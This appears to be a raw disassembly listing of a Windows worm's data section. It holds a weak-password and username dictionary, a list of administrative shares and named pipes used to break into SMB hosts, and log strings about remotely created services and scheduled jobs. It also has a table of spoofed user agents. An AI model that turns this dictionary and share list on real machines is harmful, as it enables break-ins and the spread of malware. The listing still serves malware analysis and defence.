dd offset aSysadmin ; "sysadmin"
dd offset aSysop ; "sysop"
dd offset aSecret ; "secret"
dd offset aSecrets ; "secrets"
dd offset aSex_0 ; "sex"
dd offset aSexy ; "sexy"
dd offset aSlave ; "slave"
dd offset aStudents ; "students"
dd offset aServer ; "SERVER"
dd offset aSql ; "sql"
dd offset aSqlpass ; "sqlpass"
dd offset aUsers ; "users"
dd offset off_43CF08
dd offset off_43CF04
dd offset aVirus ; "virus"
dd offset aVps ; "vps"
dd offset aWin2000 ; "win2000"
dd offset aWin2k ; "win2k"
dd offset aWindose ; "windose"
dd offset aWindows ; "windows"
dd offset aWindows2k ; "windows2k"
dd offset aWindows95 ; "windows95"
dd offset aWindows98 ; "windows98"
dd offset aWindowsme ; "windowsME"
dd offset aWindowsxp ; "WindowsXP"
dd offset aWindowz ; "windowz"
dd offset aWindoze ; "windoze"
dd offset aWindoze2k ; "windoze2k"
dd offset aWindoze95 ; "windoze95"
dd offset aWindoze98 ; "windoze98"
dd offset aWindozeme ; "windozeME"
dd offset aWindozexp ; "windozexp"
dd offset aWine ; "wine"
dd offset aWing ; "wing"
dd offset aWinnt ; "winnt"
dd offset aWinpass ; "winpass"
dd offset aWinston ; "winston"
dd offset aWinxp ; "winxp"
dd offset aWired ; "wired"
dd offset aWin ; "win"
dd offset aWinxp ; "winxp"
dd offset aWin2k ; "win2k"
dd offset aWindows ; "windows"
dd offset aWww ; "www"
dd offset asc_432D3C ; "x"
dd offset aXfer ; "xfer"
dd offset aXp_0 ; "xp"
dd offset aXx ; "xx"
dd offset aXxx ; "xxx"
dd offset aXxxx ; "xxxx"
dd offset aXxxxx ; "xxxxx"
dd offset aXxxxxx ; "xxxxxx"
dd offset aXxxxxxx ; "xxxxxxx"
dd offset aXxxxxxxx ; "xxxxxxxx"
dd offset aXxxxxxxxx ; "xxxxxxxxx"
dd offset aXyz ; "xyz"
dd offset aXyzzy ; "xyzzy"
dd offset aYouwontguessme ; "youwontguessme"
dd offset aYxcv ; "yxcv"
dd offset aZap ; "zap"
dd offset aZxc ; "zxc"
dd offset aZxcv ; "zxcv"
dd 0
aZxcv db 'zxcv',0 ; DATA XREF: .text:0043CD94�o
align 4
aZxc db 'zxc',0 ; DATA XREF: .text:0043CD90�o
aZap db 'zap',0 ; DATA XREF: .text:0043CD8C�o
aYxcv db 'yxcv',0 ; DATA XREF: .text:0043CD88�o
align 4
aYouwontguessme db 'youwontguessme',0 ; DATA XREF: .text:0043CD84�o
align 4
aXyzzy db 'xyzzy',0 ; DATA XREF: .text:0043CD80�o
align 4
aXyz db 'xyz',0 ; DATA XREF: .text:0043CD7C�o
aXxxxxxxxx db 'xxxxxxxxx',0 ; DATA XREF: .text:0043CD78�o
align 4
aXxxxxxxx db 'xxxxxxxx',0 ; DATA XREF: .text:0043CD74�o
align 4
aXxxxxxx db 'xxxxxxx',0 ; DATA XREF: .text:0043CD70�o
aXxxxxx db 'xxxxxx',0 ; DATA XREF: .text:0043CD6C�o
align 4
aXxxxx db 'xxxxx',0 ; DATA XREF: .text:0043CD68�o
align 10h
aXx db 'xx',0 ; DATA XREF: .text:0043CD5C�o
align 4
aXp_0 db 'xp',0 ; DATA XREF: .text:0043CD58�o
align 4
aXfer db 'xfer',0 ; DATA XREF: .text:0043CD54�o
align 10h
aWww db 'www',0 ; DATA XREF: .text:0043CD4C�o
aWin db 'win',0 ; DATA XREF: .text:0043CD3C�o
aWired db 'wired',0 ; DATA XREF: .text:0043CD38�o
align 10h
aWinxp db 'winxp',0 ; DATA XREF: .text:0043CD34�o
; .text:0043CD40�o
align 4
aWinston db 'winston',0 ; DATA XREF: .text:0043CD30�o
aWinpass db 'winpass',0 ; DATA XREF: .text:0043CD2C�o
aWinnt db 'winnt',0 ; DATA XREF: .text:0043CD28�o
align 10h
aWing db 'wing',0 ; DATA XREF: .text:0043CD24�o
align 4
aWine db 'wine',0 ; DATA XREF: .text:0043CD20�o
align 10h
aWindozexp db 'windozexp',0 ; DATA XREF: .text:0043CD1C�o
align 4
aWindozeme db 'windozeME',0 ; DATA XREF: .text:0043CD18�o
align 4
aWindoze98 db 'windoze98',0 ; DATA XREF: .text:0043CD14�o
align 4
aWindoze95 db 'windoze95',0 ; DATA XREF: .text:0043CD10�o
align 10h
aWindoze2k db 'windoze2k',0 ; DATA XREF: .text:0043CD0C�o
align 4
aWindoze db 'windoze',0 ; DATA XREF: .text:0043CD08�o
aWindowz db 'windowz',0 ; DATA XREF: .text:0043CD04�o
aWindowsxp db 'WindowsXP',0 ; DATA XREF: .text:0043CD00�o
align 4
aWindowsme db 'windowsME',0 ; DATA XREF: .text:0043CCFC�o
align 4
aWindows98 db 'windows98',0 ; DATA XREF: .text:0043CCF8�o
align 10h
aWindows95 db 'windows95',0 ; DATA XREF: .text:0043CCF4�o
align 4
aWindows2k db 'windows2k',0 ; DATA XREF: .text:0043CCF0�o
align 4
aWindows db 'windows',0 ; DATA XREF: .text:0043CCEC�o
; .text:0043CD48�o
aWindose db 'windose',0 ; DATA XREF: .text:0043CCE8�o
aWin2k db 'win2k',0 ; DATA XREF: .text:0043CCE4�o
; .text:0043CD44�o
align 10h
aWin2000 db 'win2000',0 ; DATA XREF: .text:0043CCE0�o
aVps db 'vps',0 ; DATA XREF: .text:0043CCDC�o
aVirus db 'virus',0 ; DATA XREF: .text:0043CCD8�o
align 4
off_43CF04 dd offset word_636E76 ; DATA XREF: .text:0043CCD4�o
; .text:00449108�o
off_43CF08 dd offset loc_415352+3 ; DATA XREF: sub_41912B:loc_4198BD�o
; .text:0043CCD0�o
aSqlpass db 'sqlpass',0 ; DATA XREF: .text:0043CCC8�o
aSql db 'sql',0 ; DATA XREF: .text:0043CCC4�o
aServer db 'SERVER',0 ; DATA XREF: .text:0043CCC0�o
align 10h
aStudents db 'students',0 ; DATA XREF: .text:0043CCBC�o
align 4
aSlave db 'slave',0 ; DATA XREF: .text:0043CCB8�o
align 4
aSexy db 'sexy',0 ; DATA XREF: .text:0043CCB4�o
align 4
aSex_0 db 'sex',0 ; DATA XREF: .text:0043CCB0�o
aSecrets db 'secrets',0 ; DATA XREF: .text:0043CCAC�o
aSysop db 'sysop',0 ; DATA XREF: .text:0043CCA4�o
align 10h
aSysadmin db 'sysadmin',0 ; DATA XREF: .text:0043CCA0�o
align 4
aSys db 'sys',0 ; DATA XREF: .text:0043CC9C�o
aSupport db 'support',0 ; DATA XREF: .text:0043CC98�o
aSuperuser db 'superuser',0 ; DATA XREF: .text:0043CC94�o
align 4
aSuper db 'super',0 ; DATA XREF: .text:0043CC90�o
align 4
aScorpion db 'scorpion',0 ; DATA XREF: .text:0043CC88�o
align 4
aSchool db 'school',0 ; DATA XREF: .text:0043CC84�o
align 10h
aSatan db 'satan',0 ; DATA XREF: .text:0043CC80�o
align 4
aSa db 'sa',0 ; DATA XREF: .text:0043CC7C�o
align 4
aUserpassword db 'userpassword',0 ; DATA XREF: .text:0043CC78�o
align 4
aUsername db 'username',0 ; DATA XREF: .text:0043CC74�o
align 4
aUsermane db 'usermane',0 ; DATA XREF: .text:0043CC70�o
align 4
aUser1 db 'user1',0 ; DATA XREF: .text:0043CC6C�o
align 4
aTrojan db 'trojan',0 ; DATA XREF: .text:0043CC68�o
align 4
aTesting db 'testing',0 ; DATA XREF: .text:0043CC64�o
aTester db 'tester',0 ; DATA XREF: .text:0043CC60�o
align 4
aTest123 db 'test123',0 ; DATA XREF: .text:0043CC5C�o
aTest db 'Test',0 ; DATA XREF: .text:0043CC58�o
align 4
aRooted db 'rooted',0 ; DATA XREF: .text:0043CC54�o
align 4
aRemote db 'remote',0 ; DATA XREF: .text:0043CC4C�o
align 4
aQwerty db 'qwerty',0 ; DATA XREF: .text:0043CC40�o
; .text:00449114�o
align 4
aQwert db 'qwert',0 ; DATA XREF: .text:0043CC3C�o
align 4
aQwer db 'qwer',0 ; DATA XREF: .text:0043CC38�o
align 4
aQwe db 'qwe',0 ; DATA XREF: .text:0043CC34�o
aPorn db 'porn',0 ; DATA XREF: .text:0043CC28�o
align 4
aPimp db 'pimp',0 ; DATA XREF: .text:0043CC24�o
align 10h
aPwd db 'pwd',0 ; DATA XREF: .text:0043CC20�o
aPw123 db 'pw123',0 ; DATA XREF: .text:0043CC1C�o
align 4
aPw db 'pw',0 ; DATA XREF: .text:0043CC18�o
align 10h
aPassword123 db 'password123',0 ; DATA XREF: .text:0043CC14�o
aPassword1 db 'password1',0 ; DATA XREF: .text:0043CC10�o
align 4
aPassword_1 db 'Password',0 ; DATA XREF: .text:0043CC0C�o
align 4
aPassword_0 db 'PASSWORD',0 ; DATA XREF: .text:0043CC08�o
align 10h
aPassword db 'password',0 ; DATA XREF: .text:0043CC04�o
; .text:004490FC�o
align 4
aPasswd db 'passwd',0 ; DATA XREF: .text:0043CC00�o
align 4
aPass1234 db 'pass1234',0 ; DATA XREF: .text:0043CBFC�o
align 10h
aPass123 db 'pass123',0 ; DATA XREF: .text:0043CBF8�o
aPass_0 db 'pass',0 ; DATA XREF: .text:0043CBF4�o
; .text:0044910C�o
align 10h
aOwned db 'owned',0 ; DATA XREF: .text:0043CBEC�o
align 4
aOwn db 'own',0 ; DATA XREF: .text:0043CBE8�o
aNull_1 db 'NULL',0 ; DATA XREF: .text:0043CBE4�o
align 4
aMyvps db 'myvps',0 ; DATA XREF: .text:0043CBDC�o
align 4
aMssql db 'mssql',0 ; DATA XREF: .text:0043CBD8�o
align 4
aMysql db 'mysql',0 ; DATA XREF: .text:0043CBD4�o
align 4
aM_3 db 'M$',0 ; DATA XREF: sub_4130E5+10A�o
; .text:0043CBD0�o
align 10h
aMypc123 db 'mypc123',0 ; DATA XREF: .text:0043CBCC�o
aMypc db 'mypc',0 ; DATA XREF: .text:0043CBC8�o
; .text:0043CBE0�o
align 10h
aMypass123 db 'mypass123',0 ; DATA XREF: .text:0043CBC4�o
align 4
aMypass db 'mypass',0 ; DATA XREF: .text:0043CBC0�o
align 4
aMs db 'MS',0 ; DATA XREF: .text:0043CBBC�o
align 4
aMack db 'mack',0 ; DATA XREF: .text:0043CBB8�o
align 10h
aMacintosh db 'macintosh',0 ; DATA XREF: .text:0043CBB4�o
align 4
aMachine db 'machine',0 ; DATA XREF: .text:0043CBB0�o
aMicrosoft db 'microsoft',0 ; DATA XREF: .text:0043CBAC�o
align 10h
aMyvnc db 'myvnc',0
align 4
aMaster db 'master',0 ; DATA XREF: .text:00449110�o
align 10h
aLoginpass db 'loginpass',0
align 4
aLocal db 'LOCAL',0
align 4
aLogin db 'login',0
align 4
aUnix_0 db 'Unix',0
align 4
aL33t db 'l33t',0
align 4
aL337 db 'l337',0
align 4
aLetmein db 'letmein',0 ; DATA XREF: .text:004490F0�o
aHaxing db 'haxing',0
align 4
aHax0r db 'hax0r',0
align 4
aHax db 'hax',0
aHacked db 'hacked',0
align 4
aH4x0r db 'h4x0r',0
align 10h
aGuessme db 'guessme',0
aGuess db 'guess',0
align 10h
aFuckyou db 'fuckyou',0
aFucker db 'fucker',0
align 10h
aFucked db 'fucked',0
align 4
aEngland db 'england',0
aEducation db 'education',0
align 4
dd offset byte_554445
dd 782Ah, 33336C65h, 74h, 616D6F64h, 61706E69h, 6F777373h
dd 6472h, 616D6F64h, 61706E69h, 7373h, 61706264h, 7373h
dd 32316264h, 3433h, 67617264h, 6E6Fh, 6B736564h, 706F74h
dd 64616564h, 0
aDave db 'dave',0
align 4
aDatabasepasswo db 'databasepassword',0
align 4
aDatabasepass db 'databasepass',0
align 4
aDatabase db 'database',0
align 4
aDaemon db 'daemon',0
align 10h
aD00d db 'd00d',0
align 4
aDefaultpass db 'defaultpass',0
aClosed db 'closed',0
align 4
aClosed_0 db 'closed!',0
aCustomer db 'customer',0
align 10h
aChangeme db 'changeme!',0
align 4
aChangeme_0 db 'changeme',0
align 4
aChangethis db 'changethis',0
align 4
aChange db 'change',0
align 4
aCanada db 'Canada',0 ; DATA XREF: sub_41912B+1E9�o
; .text:0043CAD8�o
align 4
aBlack db 'black',0 ; DATA XREF: .text:0043CAD0�o
align 4
aBackdoor db 'backdoor',0 ; DATA XREF: .text:0043CAC8�o
align 4
aApache db 'apache',0 ; DATA XREF: .text:0043CAC4�o
align 10h
aAnything db 'anything',0 ; DATA XREF: .text:0043CAC0�o
align 4
aAcademic db 'academic',0 ; DATA XREF: .text:0043CAAC�o
align 4
aAcademia db 'academia',0 ; DATA XREF: .text:0043CAA8�o
align 4
aAbc123 db 'abc123',0 ; DATA XREF: .text:0043CAA0�o
align 4
off_43D30C dd offset byte_636261 ; DATA XREF: .text:0043CA9C�o
aAbcd db 'abcd',0 ; DATA XREF: .text:0043CA98�o
; .text:0043CAA4�o
align 4
aAsdf db 'asdf',0 ; DATA XREF: .text:0043CA94�o
align 10h
aAaaa db 'AAAA',0 ; DATA XREF: .text:0043CA90�o
align 4
aAussie db 'aussie',0 ; DATA XREF: .text:0043CA84�o
align 10h
a88888888 db '88888888',0 ; DATA XREF: .text:0043CA7C�o
align 4
a654321 db '654321',0 ; DATA XREF: .text:0043CA78�o
; .text:0044911C�o
align 4
a54321 db '54321',0 ; DATA XREF: .text:0043CA74�o
align 4
a123qwe db '123qwe',0 ; DATA XREF: .text:0043CA70�o
align 4
a123asd db '123asd',0 ; DATA XREF: .text:0043CA6C�o
align 4
a123abc db '123abc',0 ; DATA XREF: .text:0043CA68�o
align 4
a1234qwer db '1234qwer',0 ; DATA XREF: .text:0043CA64�o
align 10h
a123467890 db '123467890',0 ; DATA XREF: .text:0043CA60�o
align 4
a12346789 db '12346789',0 ; DATA XREF: .text:0043CA5C�o
align 4
a1234678 db '1234678',0 ; DATA XREF: .text:0043CA58�o
a123467 db '123467',0 ; DATA XREF: .text:0043CA54�o
align 4
a12346 db '12346',0 ; DATA XREF: .text:0043CA50�o
align 10h
a123456789 db '123456789',0 ; DATA XREF: .text:0043CA4C�o
align 4
a12345678 db '12345678',0 ; DATA XREF: .text:0043CA48�o
; .text:00449118�o
align 4
a1234567 db '1234567',0 ; DATA XREF: .text:0043CA44�o
; .text:004490F8�o
a123456 db '123456',0 ; DATA XREF: .text:0043CA40�o
; .text:00449104�o
align 4
a12345 db '12345',0 ; DATA XREF: .text:0043CA3C�o
; .text:00449100�o
align 10h
a1234 db '1234',0 ; DATA XREF: .text:0043CA38�o
; .text:004490EC�o
align 4
a123123 db '123123',0 ; DATA XREF: .text:0043CA34�o
align 10h
a123 db '123',0 ; DATA XREF: .text:0043CA30�o
; .text:off_4490E8�o
a121212 db '121212',0 ; DATA XREF: .text:0043CA2C�o
align 4
a121 db '121',0 ; DATA XREF: .text:0043CA28�o
a12 db '12',0 ; DATA XREF: .text:0043CA24�o
align 4
a11111111 db '11111111',0 ; DATA XREF: .text:0043CA1C�o
; .text:0043CA20�o
align 10h
a111111 db '111111',0 ; DATA XREF: .text:0043CA18�o
align 4
a111 db '111',0 ; DATA XREF: .text:0043CA10�o
; .text:0043CA14�o
a110 db '110',0 ; DATA XREF: .text:0043CA0C�o
a0wned db '0wned',0 ; DATA XREF: .text:0043CA04�o
align 4
a0wn3d db '0wn3d',0 ; DATA XREF: .text:0043CA00�o
align 10h
a007 db '007',0 ; DATA XREF: .text:0043C9FC�o
a00000000 db '00000000',0 ; DATA XREF: .text:0043C9F8�o
align 10h
a000000 db '000000',0 ; DATA XREF: .text:0043C9F4�o
align 4
a00000 db '00000',0 ; DATA XREF: .text:0043C9F0�o
align 10h
a0000 db '0000',0 ; DATA XREF: .text:0043C9EC�o
align 4
a000 db '000',0 ; DATA XREF: .text:0043C9E8�o
a00 db '00',0 ; DATA XREF: .text:0043C9E4�o
align 10h
asc_43D450 db '%%%%%',0 ; DATA XREF: .text:0043C9DC�o
align 4
asc_43D458 db '%%%%',0 ; DATA XREF: .text:0043C9D8�o
align 10h
asc_43D460 db '%%%',0 ; DATA XREF: .text:0043C9D4�o
asc_43D464 db '%%',0 ; DATA XREF: .text:0043C9D0�o
align 4
asc_43D468: ; DATA XREF: .text:0043C9CC�o
unicode 0, <%>,0
a@_1 db '!@#$%^&*',0 ; DATA XREF: .text:0043C9C8�o
align 4
aXxx_0 db 'xXx',0 ; DATA XREF: .text:0043C9B4�o
aXxxx db 'xxxx',0 ; DATA XREF: .text:0043C9B0�o
; .text:0043CD64�o
align 4
aXxx db 'xxx',0 ; DATA XREF: .text:0043C9AC�o
; .text:0043CD60�o
aAdministrato_0 db 'administrator',0 ; DATA XREF: .text:0043C994�o
align 4
aAdmin123 db 'admin123',0 ; DATA XREF: .text:0043C990�o
align 4
aAdmin_0 db 'admin',0 ; DATA XREF: .text:0043C98C�o
; .text:004490F4�o
align 4
aBoss db 'BOSS',0 ; DATA XREF: .text:0043C940�o
; .text:0043C9A0�o
align 4
aAccounts db 'accounts',0 ; DATA XREF: .text:0043C93C�o
; .text:0043CABC�o
align 10h
aAccounting db 'accounting',0 ; DATA XREF: .text:0043C938�o
; .text:0043CAB8�o
align 4
aAccount db 'account',0 ; DATA XREF: .text:0043C934�o
; .text:0043CAB4�o
aAccess db 'access',0 ; DATA XREF: .text:0043C930�o
; .text:0043CAB0�o
align 4
aSecret db 'secret',0 ; DATA XREF: .text:0043C928�o
; .text:0043CCA8�o
align 4
aM_4 db 'm$',0 ; DATA XREF: .text:0043C924�o
align 4
aMs_user db 'MS_USER',0 ; DATA XREF: .text:0043C920�o
; .text:0043CBA8�o
aBillgates db 'billgates',0 ; DATA XREF: .text:0043C91C�o
; .text:0043CAD4�o
align 4
aUsers db 'users',0 ; DATA XREF: .text:0043C918�o
; .text:0043CCCC�o
align 4
aQaz db 'qaz',0 ; DATA XREF: .text:0043C914�o
; .text:0043CC30�o
a1_0: ; DATA XREF: .text:0043C910�o
; .text:0043CA08�o
unicode 0, <1>,0
off_43D50C dd offset byte_616161 ; DATA XREF: .text:0043C904�o
; .text:0043CA8C�o
aLinux db 'linux',0 ; DATA XREF: .text:0043C8FC�o
align 4
aUnix db 'unix',0 ; DATA XREF: .text:0043C8F8�o
align 10h
a@_0 db '!@#$%^&',0 ; DATA XREF: .text:0043C8F4�o
; .text:0043C9C4�o
a@_2 db '!@#$%^',0 ; DATA XREF: .text:0043C8F0�o
; .text:0043C9C0�o
align 10h
a@_3 db '!@#$%',0 ; DATA XREF: .text:0043C8EC�o
; .text:0043C9BC�o
align 4
a@_4 db '!@#$',0 ; DATA XREF: .text:0043C8E8�o
; .text:0043C9B8�o
align 10h
a@_5 db '!@#',0 ; DATA XREF: .text:0043C8E4�o
a@_6 db '!@',0 ; DATA XREF: .text:0043C8E0�o
align 4
a31337 db '31337',0 ; DATA XREF: .text:0043C8DC�o
; .text:0043C9A4�o ...
align 10h
aDefault_0 db 'default',0 ; DATA XREF: .text:0043C8D8�o
aGuest_0 db 'guest',0 ; DATA XREF: .text:0043C8D4�o
align 10h
aBillGates db 'bill gates',0 ; DATA XREF: .text:0043C8D0�o
; .text:0043CACC�o
align 4
aRdp db 'rdp',0 ; DATA XREF: .text:0043C8CC�o
; .text:0043CC44�o
aR00t db 'r00t',0 ; DATA XREF: .text:0043C8C8�o
; .text:0043CC48�o
align 4
aRoot db 'root',0 ; DATA XREF: .text:0043C8C4�o
; .text:0043CC50�o
align 10h
aOwner db 'owner',0 ; DATA XREF: .text:0043C8C0�o
; .text:0043C99C�o ...
align 4
aManager db 'manager',0 ; DATA XREF: .text:0043C8BC�o
; .text:0043C92C�o ...
aAdministrators db 'Administrators',0 ; DATA XREF: .text:0043C8B8�o
; .text:0043C988�o
align 10h
aAdministration db 'Administration',0 ; DATA XREF: .text:0043C8B4�o
; .text:0043C984�o
align 10h
aAdministratori db 'Administratori',0 ; DATA XREF: .text:0043C8B0�o
; .text:0043C980�o
align 10h
aAdministratore db 'Administratore',0 ; DATA XREF: .text:0043C8AC�o
; .text:0043C97C�o
align 10h
aAdministrado_0 db 'Administrador',27h,0 ; DATA XREF: .text:0043C8A8�o
; .text:0043C978�o
align 10h
aAdministratoro db 'Administratoro',0 ; DATA XREF: .text:0043C8A4�o
; .text:0043C974�o
align 10h
aAdministrada db 'Administrada',0 ; DATA XREF: .text:0043C8A0�o
; .text:0043C970�o
align 10h
aAdministrateur db 'Administrateur',0 ; DATA XREF: .text:0043C89C�o
; .text:0043C96C�o
align 10h
aAdministrador db 'Administrador',0 ; DATA XREF: .text:0043C898�o
; .text:0043C968�o
align 10h
aAdministrator db 'Administrator',0 ; DATA XREF: .text:0043C894�o
; .text:0043C964�o
align 10h
aAdmin db 'ADMIN',0 ; DATA XREF: .text:0043C890�o
; .text:0043C960�o
align 4
aAdmins db 'admins',0 ; DATA XREF: .text:0043C88C�o
; .text:0043C95C�o
align 10h
aAdm db 'adm',0 ; DATA XREF: .text:0043C888�o
; .text:0043C958�o
aSystem_0 db 'SYSTEM',0 ; DATA XREF: sub_4146B9+36�o
; .text:0043C884�o ...
align 4
aDDDDD db '%d%d%d%d%d',0 ; DATA XREF: sub_412EB7+87�o
align 4
aSSS_1 db '%s\%s\%s',0 ; DATA XREF: sub_412EB7+3B�o
; sub_4130E5+285�o
align 4
aServicesactive db 'ServicesActive',0 ; DATA XREF: sub_412EB7+11�o
; sub_41B0B0+18�o
align 4
aSSSSSSNetsched db '%s %s: -> [%s\%s, %s/%s] (NetSchedJobAdded)',0
; DATA XREF: sub_4130E5+4B2�o
aBlank db '(Blank)',0 ; DATA XREF: sub_4130E5+414�o
; sub_4130E5+45D�o
aSSSSSSCreateds db '%s %s: -> [%s\%s, %s/%s] (CreatedService)',0
; DATA XREF: sub_4130E5+3EA�o
align 4
aClients db 'clients$',0 ; DATA XREF: sub_4130E5+20A�o
align 10h
aSita db 'SITA$',0 ; DATA XREF: sub_4130E5+203�o
align 4
aLpt1 db 'LPT1$',0 ; DATA XREF: sub_4130E5+1FC�o
align 10h
aSysvol db 'SYSVOL$',0 ; DATA XREF: sub_4130E5+1F5�o
aDownloads db 'DOWNLOADS$',0 ; DATA XREF: sub_4130E5+1EE�o
align 4
aFtp_0 db 'FTP$',0 ; DATA XREF: sub_4130E5+1E7�o
align 4
aDrivec db 'drivec$',0 ; DATA XREF: sub_4130E5+1E0�o
aIis db 'IIS$',0 ; DATA XREF: sub_4130E5+1D9�o
align 4
aMssql_0 db 'MSSQL$',0 ; DATA XREF: sub_4130E5+1D2�o
align 4
aMysql_0 db 'MYSQL$',0 ; DATA XREF: sub_4130E5+1CB�o
align 4
aSql_0 db 'SQL$',0 ; DATA XREF: sub_4130E5+1C4�o
align 4
aWinnt_0 db 'WINNT$',0 ; DATA XREF: sub_4130E5+1BD�o
align 4
aWindows_0 db 'WINDOWS$',0 ; DATA XREF: sub_4130E5+1B6�o
align 4
aSystem_1 db 'SYSTEM$',0 ; DATA XREF: sub_4130E5+1AF�o
aSeclogon db 'SECLOGON$',0 ; DATA XREF: sub_4130E5+1A8�o
align 4
aDWindows db 'D:\WINDOWS$',0 ; DATA XREF: sub_4130E5+1A1�o
aDWinnt db 'D:\WINNT$',0 ; DATA XREF: sub_4130E5+19A�o
align 4
aCWindowsSystem db 'C:\WINDOWS\system32$',0 ; DATA XREF: sub_4130E5+193�o
align 4
aCWinntSystem32 db 'C:\WINNT\system32$',0 ; DATA XREF: sub_4130E5+18C�o
align 10h
aCWinnt db 'C:\WINNT$',0 ; DATA XREF: sub_4130E5+185�o
align 4
aGuest db 'GUEST$',0 ; DATA XREF: sub_4130E5+17E�o
align 4
aCWindows db 'C:\WINDOWS$',0 ; DATA XREF: sub_4130E5+177�o
aZ_4 db 'Z$',0 ; DATA XREF: sub_4130E5+170�o
align 4
aY_0 db 'Y$',0 ; DATA XREF: sub_4130E5+169�o
align 4
asc_43D7C8 db 'X$',0 ; DATA XREF: sub_4130E5+162�o
align 4
aW_0 db 'W$',0 ; DATA XREF: sub_4130E5+15B�o
align 10h
aV_1 db 'V$',0 ; DATA XREF: sub_4130E5+154�o
align 4
aU_1 db 'U$',0 ; DATA XREF: sub_4130E5+14D�o
align 4
aT_0 db 'T$',0 ; DATA XREF: sub_4130E5+146�o
align 4
aR_0 db 'R$',0 ; DATA XREF: sub_4130E5+13C�o
align 10h
aQ_1 db 'Q$',0 ; DATA XREF: sub_4130E5+132�o
align 4
aP_4 db 'P$',0 ; DATA XREF: sub_4130E5+128�o
align 4
aO_1 db 'O$',0 ; DATA XREF: sub_4130E5+11E�o
align 4
aN_1 db 'N$',0 ; DATA XREF: sub_4130E5+114�o
align 10h
asc_43D7F0 db 'L$',0 ; DATA XREF: sub_4130E5+100�o
align 4
aK_1 db 'K$',0 ; DATA XREF: sub_4130E5+F6�o
align 4
aJ_0 db 'J$',0 ; DATA XREF: sub_4130E5+EC�o
align 4
aI_2 db 'I$',0 ; DATA XREF: sub_4130E5+E2�o
align 10h
asc_43D800 db 'H$',0 ; DATA XREF: sub_4130E5+D8�o
align 4
aG_0 db 'G$',0 ; DATA XREF: sub_4130E5+CE�o
align 4
aF_0 db 'F$',0 ; DATA XREF: sub_4130E5+C4�o
align 4
aE_1 db 'E$',0 ; DATA XREF: sub_4130E5+BA�o
align 10h
aD_0 db 'D$',0 ; DATA XREF: sub_4130E5+B0�o
align 4
aC_1 db 'C$',0 ; DATA XREF: sub_4130E5+A6�o
align 4
aB_1 db 'B$',0 ; DATA XREF: sub_4130E5+9C�o
align 4
aNetlogon db 'NETLOGON$',0 ; DATA XREF: sub_4130E5+92�o
align 4
aS_7 db 'S$',0 ; DATA XREF: sub_4130E5+88�o
align 4
aPrint db 'PRINT$',0 ; DATA XREF: sub_4130E5+7E�o
align 4
aIpc db 'IPC$',0 ; DATA XREF: sub_4130E5+74�o
; sub_421589+19F�o
align 4
aAdmin_1 db 'ADMIN$',0 ; DATA XREF: sub_4130E5+6A�o
align 4
aSIpc db '%s\IPC$',0 ; DATA XREF: .text:00413698�o
aS_8 db '\\%s',0 ; DATA XREF: .text:00413657�o
; sub_421589+147�o
align 4
dword_43D854 dd 0EFFFC481h, 44FFFFh, 43D88Chdword_43D860 dd 42Ah dword_43D864 dd 3E8h dword_43D868 dd 258h byte_43D86C db 0 ; DATA XREF: sub_41391C+3A4�r
; sub_41391C+488�r
byte_43D86D db 1 ; DATA XREF: sub_41391C:loc_413CD7�r
; sub_41391C:loc_413E0E�r
align 10h
dd offset aXp ; "XP"
dd 2C6h, 264h, 0
dd 1
dword_43D884 dd 20804h ; sub_41391C+4AC�o ...
dword_43D888 dd 158h dd 322B544Eh, 4Bh
aSPipeTrkwks db '\\%s\pipe\trkwks',0 ; DATA XREF: sub_41391C+21E�o
align 4
aSPipeWkssvc db '\\%s\pipe\wkssvc',0 ; DATA XREF: sub_41391C+18E�o
align 4
aSPipeBrowser_0 db '\\%s\pipe\browser',0 ; DATA XREF: sub_41391C+FE�o
align 10h
aSPipeSrvsvc db '\\%s\pipe\srvsvc',0 ; DATA XREF: sub_41391C+6E�o
align 4
aSPipe db '\\%s\pipe',0 ; DATA XREF: sub_41391C+34�o
; sub_41391C+C4�o ...
align 10h
unicode 0, <)>,0
align 8
dd offset aMozilla5_0Wi_2 ; "Mozilla/5.0 (Windows; U; Windows NT 5.2"...
dd offset aGooglebot2_0_1 ; "Googlebot/2.0 (http://www.googlebot.com"...
dd offset aMozilla5_0Wi_3 ; "Mozilla/5.0 (Windows; U; Windows NT 5.1"...
dd offset aMozilla5_0X1_3 ; "Mozilla/5.0 (X11; U; Linux i686; en-US;"...
dd offset aMozilla4_0Co_7 ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
dd offset aMozilla5_0Co_6 ; "Mozilla/5.0 (compatible; Konqueror/3.0-"...
dd offset aMozilla4_0C_11 ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
dd offset aMozilla5_0Wi_4 ; "Mozilla/5.0 (Windows; U; Windows NT 5.1"...
dd offset aMozilla5_0Maci ; "Mozilla/5.0 (Macintosh; U; PPC Mac OS X"...
dd offset aMozilla5_0Wi_5 ; "Mozilla/5.0 (Windows; U; Windows NT 5.1"...
dd offset aMozilla4_0C_12 ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
dd offset aMozilla5_0X1_4 ; "Mozilla/5.0 (X11; U; Linux i686; en-US;"...
dd offset aMozilla5_0X1_5 ; "Mozilla/5.0 (X11; U; Linux i686; en-US;"...
dd offset aGooglebot2_1_1 ; "Googlebot/2.1 (http://www.googlebot.com"...
dd offset aMozilla5_0Wi_6 ; "Mozilla/5.0 (Windows; U; Windows NT 5.1"...
dd offset aMozilla5_0Co_7 ; "Mozilla/5.0 (compatible; Googlebot/2.1;"...
dd offset aMediapartnersG ; "Mediapartners-Google/2.1"
dd offset aGooglebot2_1Ht ; "Googlebot/2.1 (+http://www.googlebot.co"...
dd offset aLynx2_8_4rel_1 ; "Lynx/2.8.4rel.1 libwww-FM/2.14 SSL-MM/1"...
dd offset aMicrosoftWebda ; "Microsoft-WebDAV-MiniRedir/5.1.2600"
dd offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible; MSIE 4.01; Win"...
dd offset aMozilla4_0Co_0 ; "Mozilla/4.0 (compatible; MSIE 4.01; Win"...
dd offset aMozilla4_0Co_1 ; "Mozilla/4.0 (compatible; MSIE 5.0; Wind"...
dd offset aMozilla4_0C_13 ; "Mozilla/4.0 (compatible; MSIE 5.5; Wind"...
dd offset aMozilla4_0Co_3 ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
dd offset aMozilla4_0C_14 ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
dd offset aMozilla4_0Co_5 ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
dd offset aMozilla4_0Co_6 ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
